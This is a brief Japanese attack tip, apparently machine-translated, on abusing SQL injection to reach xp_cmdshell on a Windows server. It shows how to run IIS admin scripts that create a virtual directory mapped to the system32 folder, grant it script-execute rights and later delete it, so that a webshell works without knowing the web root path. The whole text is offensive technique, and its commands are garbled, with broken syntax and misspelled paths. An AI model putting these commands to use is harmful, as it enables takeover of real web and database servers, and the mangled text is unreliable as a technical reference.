sql注入による仮想ディレクトリ作成


sqlは仮想ディレクトリを作り、web絶対パスを探さないように注入します。--------------------------------私達はsql注入はカタログと実行コマンドを並べてもいいですが、webshellを見つけにくいです。これはいいです。execmater.dbo.xp()cmdshell'cscript C:\Interpub\AdminScrippts\mkwebdir.vbs-c local host-w"l"-v"win","c:\wint\system 32"'は仮想ディレクトリwinを作って、cを指します。cmdshell'cscript C:\Interputb\AdminScripts\adsutil.vbs w 3 svc/1/root/win/Access execute Ture'は、win文に解析aspスクリプトの権限があります。exmater.dbo.xp。cmdshell「cscript C:\Interpub\AdminScript s\adsutil.vbs delete w 3 svc/1/root/win/」は仮想ディレクトリを削除します。ウェブの絶対パスが見つからない解決策の一つで、http://xxx.com/win403はエラーで、仮想ディレクトリが作成されたことを示しています。